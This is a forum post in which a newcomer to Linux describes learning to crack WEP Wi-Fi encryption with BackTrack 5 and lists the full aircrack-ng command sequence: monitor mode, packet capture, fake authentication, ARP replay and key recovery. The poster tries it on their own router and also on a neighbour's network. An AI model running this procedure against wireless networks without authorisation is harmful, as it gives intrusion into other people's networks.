Hello everyone,
i freshly downloaded BT5R2 as a result of google search about how to break WEP (i don't really have too much use for it in real but i am interested and don't mind learning it anyway). I am still somehow new to linux as well (tho i have Ubuntu for quite some time now but only as secondary system).
So after some problems with installing and stuff i managed to get into the system and started to try stuff. First i set my own modem to WEP, 64-bit security and set some password to it (3 letters and few numbers) and tried to run through this but without any success. When running
Code:
aireplay-ng -1 0 -a MAC mon0
I got reply that authentication was successful 1/2.
Later one aircrack didn't break the password.

Later on i tried wifi of my GFs cousin who lives accross the street. I know his password but i was able to get it quite easily (after i got enough data that is).

Commands were pretty much the same for both tries :
Bring up mon0 interface
Code:
airmon-ng start wlan0
Scan for APs with
Code:
airodump-ng mon0
Then it's capturing pakets with
Code:
airodump-ng -w wep-test -c channel --bssid MAC mon0
After some time i tried fake authentication with
Code:
aireplay-ng -1 0 -a MAC mon0
and then asking for authentication pakets
Code:
aireplay-ng -3 -b MAC mon0
And finally to get the password
Code:
aircrack-ng wep-test-01.cap

So how to recognize the WEP and eventually switch to something else?

I have to say that my Windows7 machine didn't want to connect to my WEP router telling me it's not secured enough.
